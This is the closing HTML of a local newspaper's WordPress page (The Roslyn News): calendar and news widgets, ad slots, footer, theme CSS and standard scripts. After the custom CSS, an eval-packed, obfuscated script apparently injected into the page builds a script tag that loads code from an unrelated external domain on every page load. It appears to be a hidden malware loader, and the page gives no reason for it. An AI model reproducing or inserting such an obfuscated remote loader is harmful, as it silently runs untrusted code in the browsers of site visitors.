				</tr><tr>				<td class="eventless">
										21									</td>
								<td class="eventless">
										22									</td>
								<td class="eventless">
										23									</td>
								<td class="eventless">
										24									</td>
								<td class="eventless">
										25									</td>
								<td class="eventless">
										26									</td>
								<td class="eventless">
										27									</td>
				</tr><tr>				<td class="eventless">
										28									</td>
								<td class="eventless">
										29									</td>
								<td class="eventless">
										30									</td>
								<td class="eventless">
										31									</td>
								<td class="eventless-post">
										1									</td>
								<td class="eventless-post">
										2									</td>
								<td class="eventless-post">
										3									</td>
						</tr>
	</tbody>
</table></div></aside><aside class="widget widget_text"><div class="block-title"><span>Roslyn Area News</span></div>			<div class="textwidget"><!-- PR Newswire Sidebar Widget Code Starts Here -->
<div id="w6944_widget"></div><script language="JavaScript" src="http://tools.prnewswire.com/en-us/live/6944/widget.js"></script>
 <!-- PR Newswire Sidebar Widget Code Ends Here --></div>
		</aside><div class="td-a-rec td-a-rec-id-custom_ad_3 "><!-- /33457410/Ros_int_CubeA -->
<div id='div-gpt-ad-1463590648591-3' style='width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463590648591-3'); });
</script>
</div></div><aside class="widget widget_image"><div class="jetpack-image-container"><a target="_blank" href="http://antonnews.com/subscribe"><img src="http://roslyn-news.com/wp-content/uploads/2016/11/Roslyn_HV-line-1.jpg" class="aligncenter" width="287" height="807" /></a></div>
</aside><aside class="widget widget_text"><div class="block-title"><span>Long Island Area News</span></div>			<div class="textwidget"><!-- PR Newswire Sidebar Widget Code Starts Here -->
<div id="w6946_widget"></div><script language="JavaScript" src="http://tools.prnewswire.com/en-us/live/6946/widget.js"></script>
 <!-- PR Newswire Sidebar Widget Code Ends Here --></div>
		</aside><div class="td-a-rec td-a-rec-id-custom_ad_5 "><!-- /33457410/Ros_int_CubeB -->
<div id='div-gpt-ad-1463590648591-4' style='width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463590648591-4'); });
</script>
</div></div><aside class="widget widget_rss"><div class="block-title"><span><a class="rsswidget" href="http://longislandweekly.com/"><img class="rss-widget-icon" style="border:0" width="14" height="14" src="http://roslyn-news.com/wp-includes/images/rss.png" alt="RSS" /></a> <a class="rsswidget" href="https://longislandweekly.com/">Long Island Weekly</a></span></div><ul><li><a class='rsswidget' href='https://longislandweekly.com/charles-a-riley-ii-named-director-nassau-art-museum/'>Charles A. Riley II Named Director Of Nassau Art Museum</a></li><li><a class='rsswidget' href='https://longislandweekly.com/great-food-truck-derby-delivers-local-flavor/'>Great Food Truck Derby Delivers Local Flavor</a></li><li><a class='rsswidget' href='https://longislandweekly.com/first-hispanic-suny-four-year-college-president-named/'>First Hispanic SUNY Four-Year College President Named</a></li><li><a class='rsswidget' href='https://longislandweekly.com/7-options-didnt-receive-enough-financial-aid/'>7 Options To Consider If You Didn’t Receive Enough Financial Aid</a></li><li><a class='rsswidget' href='https://longislandweekly.com/protect-kids-head-off-college/'>Protect Your Kids As They Head Off To College</a></li></ul></aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    <div class="td-a-rec td-a-rec-id-footer_top "><!-- /33457410/Ros_728x90_pgal -->
<div id='div-gpt-ad-1463590648591-2' style='height:90px; width:728px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463590648591-2'); });
</script>
</div>
</div>		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span12">
                            </div>
        </div>
    </div>

    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://roslyn-news.com/"><img src="http://roslyn-news.com/wp-content/uploads/2016/05/Roslyn_WebLogoGray3-300x200.jpg" alt=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Since 1877, <em>The Roslyn News</em> has served the communities of Roslyn, Roslyn Harbor, Roslyn Heights, Roslyn Estates, Flower Hill, East Hills, Greenvale and Albertson with diligent coverage of local news and community events.<div class="footer-email-wrap">Contact us: <a href="mailto:roslyn@antonmediagroup.com">roslyn@antonmediagroup.com</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div><span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/TheRoslynNews" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://plus.google.com/111660607406859641288" title="Google+"><i class="td-icon-font td-icon-googleplus"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://twitter.com/RoslynNews" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                                        </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    &copy; Copyright 2017 • Anton Media Group • All Rights Reserved                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->

	<div style="display:none">
	<div class="grofile-hash-map-2a846c7f93f259110ac66ce4856deba5">
	</div>
	</div>


    <!--

        Theme: Newspaper by tagDiv 2015
        Version: 6.7 (rara)
        Deploy mode: deploy
        
        uid: 5992822c1d808
    -->

    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.td-header-main-menu {
    padding-right: 0px !important;
}
.sf-menu > li > a {
    font-weight: 500 !important;
}
.wp-caption-text, .wp-caption-dd {
    font-style: inherit !important;
}
.td-header-style-1 .td-header-sp-logo {
    height: 150px !important;
}
.td-header-style-1 .td-header-sp-logo img {
    max-height: 150px !important;
}
.td-header-style-1 .td-header-sp-recs {
    margin: 55px 0 9px 0 !important;
}
#w6946_widget {
    margin-top: -40px;
}
.widget_rss .block-title .rsswidget {
    padding: 7px 10px;
}

</style>

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))</script><script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201733'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Augaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://roslyn-news.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=6.7'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/comment-reply.min.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/wp-embed.min.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-content/plugins/akismet/_inc/form.js?ver=3.3.4'></script>

<!-- JS generated by theme -->

<script>
    

                jQuery().ready(function jQuery_ready() {
                    tdAjaxCount.tdGetViewsCountsAjax("post","[9868]");
                });
            

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://roslyn-news.com/wp-content/themes/Newspaper-child/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://roslyn-news.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


		<!--[if IE]>
		<script type="text/javascript">
		if ( 0 === window.location.hash.indexOf( '#comment-' ) ) {
			// window.location.reload() doesn't respect the Hash in IE
			window.location.hash = window.location.hash;
		}
		</script>
		<![endif]-->
		<script type="text/javascript">
			var comm_par_el = document.getElementById( 'comment_parent' ),
			    comm_par = (comm_par_el && comm_par_el.value) ? comm_par_el.value : '',
			    frame = document.getElementById( 'jetpack_remote_comment' ),
			    tellFrameNewParent;

			tellFrameNewParent = function() {
				if ( comm_par ) {
					frame.src = "http://jetpack.wordpress.com/jetpack-comment/?blogid=110631625&postid=9868&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_US&jetpack_version=5.2.1&sig=a6b3da8b6a29d53652450ad4796d186a9978ee64#parent=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" + '&replytocom=' + parseInt( comm_par, 10 ).toString();
				} else {
					frame.src = "http://jetpack.wordpress.com/jetpack-comment/?blogid=110631625&postid=9868&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_US&jetpack_version=5.2.1&sig=a6b3da8b6a29d53652450ad4796d186a9978ee64#parent=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F";
				}
			};

	
			if ( 'undefined' !== typeof addComment ) {
				addComment._Jetpack_moveForm = addComment.moveForm;

				addComment.moveForm = function( commId, parentId, respondId, postId ) {
					var returnValue = addComment._Jetpack_moveForm( commId, parentId, respondId, postId ), cancelClick, cancel;

					if ( false === returnValue ) {
						cancel = document.getElementById( 'cancel-comment-reply-link' );
						cancelClick = cancel.onclick;
						cancel.onclick = function() {
							var cancelReturn = cancelClick.call( this );
							if ( false !== cancelReturn ) {
								return cancelReturn;
							}

							if ( !comm_par ) {
								return cancelReturn;
							}

							comm_par = 0;

							tellFrameNewParent();

							return cancelReturn;
						};
					}

					if ( comm_par == parentId ) {
						return returnValue;
					}

					comm_par = parentId;

					tellFrameNewParent();

					return returnValue;
				};
			}

	
			if ( window.postMessage ) {
				if ( document.addEventListener ) {
					window.addEventListener( 'message', function( event ) {
						if ( "http:\/\/jetpack.wordpress.com" !== event.origin ) {
							return;
						}

						jQuery( frame ).height( event.data );
					} );
				} else if ( document.attachEvent ) {
					window.attachEvent( 'message', function( event ) {
						if ( "http:\/\/jetpack.wordpress.com" !== event.origin ) {
							return;
						}

						jQuery( frame ).height( event.data );
					} );
				}
			}
		</script>

	<script type='text/javascript' src='https://stats.wp.com/e-201733.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.2.1',blog:'110631625',post:'9868',tz:'-4',srv:'roslyn-news.com'} ]);
	_stq.push([ 'clickTrackerInit', '110631625', '9868' ]);
</script>

</body>
</html>